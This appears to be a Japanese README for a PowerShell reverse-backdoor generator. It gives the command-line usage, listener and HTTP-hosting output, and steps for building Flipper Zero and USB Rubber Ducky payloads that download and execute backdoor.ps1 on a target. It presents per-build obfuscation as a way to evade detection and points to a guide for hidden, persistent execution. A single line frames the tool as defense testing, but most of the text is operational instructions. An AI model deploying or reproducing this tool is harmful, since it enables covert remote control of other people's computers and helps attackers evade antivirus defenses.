
/******************************************************************************
PowerShellで記述され、Pythonで難読化されたリバースバックドアツール。ビルドごとに新しいシグネチャを生成し、検出を回避します。このツールは、Flipper ZeroやHak5 USB Rubber Duckyなどの一般的なハッキングデバイス用のペイロードを作成する機能を備えています。このツールを使用して、高度な攻撃手法に対するシステムの防御をテストしてください。
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
現在の作業ディレクトリに backdoor.ps1 というファイルが作成されます。
Windows 11、Windows 10、Kali Linuxでテスト済み。非表示ウィンドウで実行し、永続性を持たせるには、こちらのガイドに従ってください。
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
これらの攻撃のいずれかを使用する場合、バックドアをホストするHTTPサーバーを起動します。バックドアが取得されると、HTTPサーバーはシャットダウンされます。
以下のコマンドで powershell_backdoor.txt というファイルが生成されます。Flipper上でこれをトリガーすると、コンピュータからHTTP経由でバックドアを取得し実行します。
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
指定したテキストファイル(例: powershell_backdoor.txt)をFlipper Zeroに配置します。ペイロードを実行すると、backdoor.ps1 をダウンロードして実行します。
以下は、Hak5 USB Rubber Ducky用の inject.bin ファイルを生成するチュートリアルです。
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
現在の作業ディレクトリに inject.bin というファイルが配置されます。この機能にはJavaが必要です。ペイロードを実行すると、backdoor.ps1 をダウンロードして実行します。
USB Rubber Ducky攻撃用の payload.txt を inject.bin にエンコードするために、midnitesnake が作成した encoder.jar を使用しています。
以下は、5回ビルドした後の backdoor.ps1 のsha1ハッシュです。
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49